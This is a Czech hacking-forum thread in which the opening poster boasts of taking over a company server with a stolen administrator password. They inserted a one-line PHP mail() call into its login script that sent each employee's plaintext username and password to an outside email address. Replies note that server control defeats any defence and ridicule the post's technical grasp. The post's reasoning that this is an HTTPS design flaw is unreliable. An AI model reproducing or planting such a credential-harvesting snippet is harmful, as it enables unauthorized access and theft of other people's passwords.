HTTPS

HackForum

HTTPS | Lame#
Dobrý den.

Asi před půl rokem se mi podařilo získat heslo Administrátora na jednom firemním serveru. Díky tomu se mi podařilo získat přístupová hesla všech (!) zaměstnanců firmy (asi 40 lidí) a to i když hesla byla na serveru uložena v podobě Salted Hashe, uživatelé na server přistupovali výhradně přes protokol HTTPS a navíc z domu, takže nebylo možné použít KeyLogger.
Pokud si navíc uživatel heslo změnil, ihned se mi toto nové heslo uložilo.

Povdelo se mi to jen díky zranitelné fylozofii protokolu HTTPS.

Jak jistě všichni víte, protokol HTTPS je protokol pro přenos dat od klienta na server (a opačně). Komunikace však narozdíl od protokolu HTTP probíhá šifrovaně. Co je však podstatné je to, že HTTPS data šifrovaně na server pouze PŘENÁŠÍ a co se s daty dále na serveru děje, nijak neřeší....

Možná bych zde měl zdůraznit, třeba ne všem jasnou věc, že když uživatel zapíše do textboxu svoje heslo a klikne na tlačitko "Přihlásit", tak heslo je na server odesíláno v ŠIFROVANÉ podobě, NIKOLI však ve formě HASHE (!). Samotný HASH se z hesla vytváří až na serveru, ale pochopitelně až z hesla DEŠIFROVANÉHO (hash ze šifrovaného hesla by byl pro stejné heslo pokaždé jiný protože DES nebo AES klíč, který se pro šifrování používá,má samozřejmě pro každý přenos jiný tvar)

To co jsem popsal je vlastně BEZPEČNOSTNÍ DÍRA....najednou jsme v bodě, kdy je heslo na serveru v podobě plain textu (biť virtuálně, tedy neuložené). Já jsem neudělal nic jiného, než že jsem do souboru, který heslo od klienta přebíral a dělal z něj MD5 hash, vložil tento kód:

<?php
mail("pepaNovak@seznam.cz", $username, $password);
?>

(kde $username a $password byly proměnné ze vstupního formuláře).

Logoval jsem tak login a heslo poté, co bylo dešifrované , ale ještě dříve než z něj skript stačil udělat hash..:-)


Moje otázka na zkušenější - dá se nějak rozumně této chybě zabránit a je tohle slepé místo využitelné na většině serverů nebo se mi to povedlo, jen proto, že admin zmrvil nastavení serveru....






(odpovědět)
_ano_nymous_ | 70.39.66.*13.2.2014 13:42
re: HTTPS #
Pokud máš server plně pod kontrolou tak ti nepomůže ani svěcená voda.

I kdyby se třeba hash hesla počítal na straně klienta pomocí javascriptu tak pokud máš server pod kontrolou tak mu přepíšeš kód a ověřování upravíš.

Existují však metody jak detekovat takovéto nepovolené úpravy kódu a minimalizovat škody při takovém průniku.
(odpovědět)
Hnz2 | 85.71.231.*13.2.2014 17:44
re: HTTPS #
Oznacte to nekdo jako "lame", prosim. Takovou chujovinu jsem uz dlouho necetl.
(odpovědět)
kolemjdouci13.2.2014 19:34
re: HTTPS #
kolemjdouci....Můžeš mi prosím vysvětlit, proč to považuješ za chujovinu? Dík.

(odpovědět)
_ano_nymous_ | 95.130.9.*13.2.2014 22:32
re: HTTPS #
protože v toho příspěvku přímo "kape" technická neznalost
(odpovědět)
Hnz2 | 85.71.231.*14.2.2014 19:27

Zpět
 
 
 

 
BBCode